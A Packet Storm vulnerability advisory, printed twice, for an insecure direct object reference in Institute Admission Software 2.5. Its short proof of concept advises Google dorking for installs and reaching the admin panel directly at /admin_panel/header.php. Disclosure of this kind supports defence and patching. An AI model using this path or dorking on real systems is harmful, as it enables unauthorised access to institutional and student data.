Description
Institute Admission Software version 2.5 suffers from an insecure direct object reference vulnerability...
Basic Information
ID
PACKETSTORM:212933
Published
Dec 17, 2025 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : Institute Admission Software 2.5 IDOR Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 137.0.1 (64 bits) |
| # Vendor : https://softmaart.com/institute-admission-software.php |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.
[+] Use PayLoad : /admin_panel/header.php
[+] Login : http://127.0.0.1/chinmayadc.edu.in/admin_panel/header.php
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
| # Title : Institute Admission Software 2.5 IDOR Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 137.0.1 (64 bits) |
| # Vendor : https://softmaart.com/institute-admission-software.php |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.
[+] Use PayLoad : /admin_panel/header.php
[+] Login : http://127.0.0.1/chinmayadc.edu.in/admin_panel/header.php
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================